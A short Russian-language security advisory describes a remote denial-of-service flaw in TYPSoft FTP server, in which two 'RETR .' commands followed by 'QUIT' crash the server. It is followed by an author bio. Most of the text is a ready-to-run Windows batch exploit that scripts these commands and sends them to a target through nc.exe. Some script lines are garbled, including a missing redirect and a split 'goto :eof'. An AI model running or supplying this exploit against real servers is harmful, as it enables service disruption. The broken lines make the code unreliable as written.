Удаленный отказ в обслуживании в TYPSoft FTP server

Уязвимость обнаружена в TYPSoft FTP server. Удаленный авторизованный пользователь может вызвать условия отказа в обслуживании на целевом сервере.
Удаленный авторизованный пользователем (включая анонимного пользователя) может выполнить две последовательных команды "RETR .", за которыми следует команда "QUIT", чтобы вызвать условия отказа в обслуживании на целевом FTP сервере.

Эксплоит:

@echo off
if '%3'=='' echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto
:eof
set FTPUSER=%2
set FTPPWD=%3
set PORT=21
if not '%4'=='' set PORT=%4
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&goto :eof

echo USER %FTPUSER%ftp.cmd
echo PASS %FTPPWD%>ftp.cmd
echo RETR .>>ftp.cmd
echo RETR .>>ftp.cmd
echo QUIT>>ftp.cmd
nc -v %1 %PORT%<ftp.cmd
del ftp.cmd

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.